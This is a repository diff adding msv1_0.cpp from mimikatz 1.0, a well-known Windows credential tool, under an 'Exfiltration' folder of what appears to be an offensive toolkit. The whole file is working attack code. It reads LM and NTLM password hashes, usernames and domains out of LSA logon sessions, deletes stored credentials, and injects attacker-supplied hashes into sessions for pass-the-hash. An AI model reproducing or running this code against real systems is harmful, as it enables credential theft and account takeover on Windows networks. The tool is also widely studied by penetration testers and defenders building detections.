diff options
Diffstat (limited to 'Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.cpp')
| -rw-r--r-- | Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.cpp | 153 |
1 files changed, 153 insertions, 0 deletions
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.cpp new file mode 100644 index 0000000..b429e5a --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.cpp @@ -0,0 +1,153 @@ +/* Benjamin DELPY `gentilkiwi` + http://blog.gentilkiwi.com + benjamin@gentilkiwi.com + Licence : http://creativecommons.org/licenses/by/3.0/fr/ + Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ +*/ +#include "msv1_0.h" + +bool searchMSVFuncs() +{ + if(!MSV1_0_MspAuthenticationPackageId) + MSV1_0_MspAuthenticationPackageId = (mod_system::GLOB_Version.dwBuildNumber < 7000) ? 2 : 3; + return (searchLSAFuncs() && (MSV1_0_MspAuthenticationPackageId != 0)); +} + +bool WINAPI getMSVLogonData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity) +{ + wostringstream maReponse; + if(searchMSVFuncs()) + { + unsigned short reservedSize = 0; + PMSV1_0_PRIMARY_CREDENTIAL kiwiCreds = NULL; + if(NT_SUCCESS(NlpGetPrimaryCredential(logId, &kiwiCreds, &reservedSize))) + { + wstring lmHash = mod_text::stringOfHex(kiwiCreds->LmOwfPassword, sizeof(kiwiCreds->LmOwfPassword)); + wstring ntHash = mod_text::stringOfHex(kiwiCreds->NtOwfPassword, sizeof(kiwiCreds->NtOwfPassword)); + + if(justSecurity) + maReponse << L"lm{ " << lmHash << L" }, ntlm{ " << ntHash << L" }"; + else + { + maReponse << endl << + L"\t * Utilisateur : " << mod_text::stringOfSTRING(kiwiCreds->UserName) << endl << + L"\t * Domaine : " << mod_text::stringOfSTRING(kiwiCreds->LogonDomainName) << endl << + L"\t * Hash LM : " << lmHash << endl << + L"\t * Hash NTLM : " << ntHash; + } + SeckPkgFunctionTable->FreeLsaHeap(kiwiCreds); + } + else maReponse << L"n.t. (LUID KO)"; + } + else maReponse << L"n.a. (msv KO)"; + + return sendTo(monPipe, maReponse.str()); +} + +__kextdll bool __cdecl getLogonSessions(mod_pipe * monPipe, vector<wstring> * mesArguments) +{ + vector<pair<PFN_ENUM_BY_LUID, wstring>> monProvider; + monProvider.push_back(make_pair<PFN_ENUM_BY_LUID, wstring>(getMSVLogonData, wstring(L"msv1_0"))); + return getLogonData(monPipe, mesArguments, &monProvider); +} + +__kextdll bool __cdecl delLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments) +{ + wostringstream maReponse; + if(searchMSVFuncs()) + { + if(!mesArguments->empty() && mesArguments->size() >= 1 && mesArguments->size() <= 2) + { + wstring idSecAppHigh = L"0"; + wstring idSecAppLow = mesArguments->front(); + if(mesArguments->size() > 1) + { + idSecAppHigh = mesArguments->front(); idSecAppLow = mesArguments->back(); + } + + LUID idApp = mod_text::wstringsToLUID(idSecAppHigh, idSecAppLow); + if(idApp.LowPart != 0 || idApp.HighPart != 0) + maReponse << (NT_SUCCESS(NlpDeletePrimaryCredential(&idApp)) ? L"Suppression des données de sécurité réussie :)" : L"Suppression des données de sécurité en échec :("); + else maReponse << L"LUID incorrect !"; + } + else maReponse << L"Format d\'appel invalide : delLogonSession [idSecAppHigh] idSecAppLow"; + } + else maReponse << L"n.a. (msv KO)"; + + maReponse << endl; + return sendTo(monPipe, maReponse.str()); +} + +__kextdll bool __cdecl addLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments) +{ + wostringstream maReponse; + if(searchMSVFuncs()) + { + if(!mesArguments->empty() && mesArguments->size() >= 4 && mesArguments->size() <= 6) + { + MSV1_0_PRIMARY_CREDENTIAL kiwicreds; + RtlZeroMemory(&kiwicreds, sizeof(MSV1_0_PRIMARY_CREDENTIAL)); + + wstring idSecAppHigh = L"0", idSecAppLow, userName, domainName, lmHash, ntlmHash = mesArguments->back(); + kiwicreds.LmPasswordPresent = FALSE; + kiwicreds.NtPasswordPresent = TRUE; + + switch(mesArguments->size()) // méchants arguments utilisateurs + { + case 4: + idSecAppLow = mesArguments->front(); + userName = mesArguments->at(1); + domainName = mesArguments->at(2); + break; + case 6: + idSecAppHigh = mesArguments->front(); + idSecAppLow = mesArguments->at(1); + userName = mesArguments->at(2); + domainName = mesArguments->at(3); + kiwicreds.LmPasswordPresent = TRUE; + lmHash = mesArguments->at(4); + break; + case 5: + if(mesArguments->at(3).size() == 0x20) + { + idSecAppLow = mesArguments->front(); + userName = mesArguments->at(1); + domainName = mesArguments->at(2); + kiwicreds.LmPasswordPresent = TRUE; + lmHash = mesArguments->at(3); + } + else + { + idSecAppHigh = mesArguments->front(); + idSecAppLow = mesArguments->at(1); + userName = mesArguments->at(2); + domainName = mesArguments->at(3); + } + break; + } + + LUID idApp = mod_text::wstringsToLUID(idSecAppHigh, idSecAppLow); + + if(idApp.LowPart != 0 || idApp.HighPart != 0) + { + if((!kiwicreds.LmPasswordPresent || (lmHash.size() == 0x20)) && ntlmHash.size() == 0x20 && userName.size() <= MAX_USERNAME_LEN && domainName.size() <= MAX_DOMAIN_LEN) + { + mod_text::InitLsaStringToBuffer(&kiwicreds.UserName, userName, kiwicreds.BuffUserName); + mod_text::InitLsaStringToBuffer(&kiwicreds.LogonDomainName, domainName, kiwicreds.BuffDomaine); + if(kiwicreds.LmPasswordPresent) + mod_text::wstringHexToByte(lmHash, kiwicreds.LmOwfPassword); + mod_text::wstringHexToByte(ntlmHash, kiwicreds.NtOwfPassword); + + maReponse << (NT_SUCCESS(NlpAddPrimaryCredential(&idApp, &kiwicreds, sizeof(kiwicreds))) ? L"Injection de données de sécurité réussie :)" : L"Injection de données de sécurité en échec :("); + } + else maReponse << L"Les hashs LM et NTLM doivent faire 32 caractères, le nom d\'utilisateur et le domaine/poste au maximum 22 caractères"; + } + else maReponse << L"LUID incorrect !"; + } + else maReponse << L"Format d\'appel invalide : addLogonSession [idSecAppHigh] idSecAppLow Utilisateur {Domaine|Poste} [HashLM] HashNTLM"; + } + else maReponse << L"n.a. (msv KO)"; + + maReponse << endl; + return sendTo(monPipe, maReponse.str()); +} |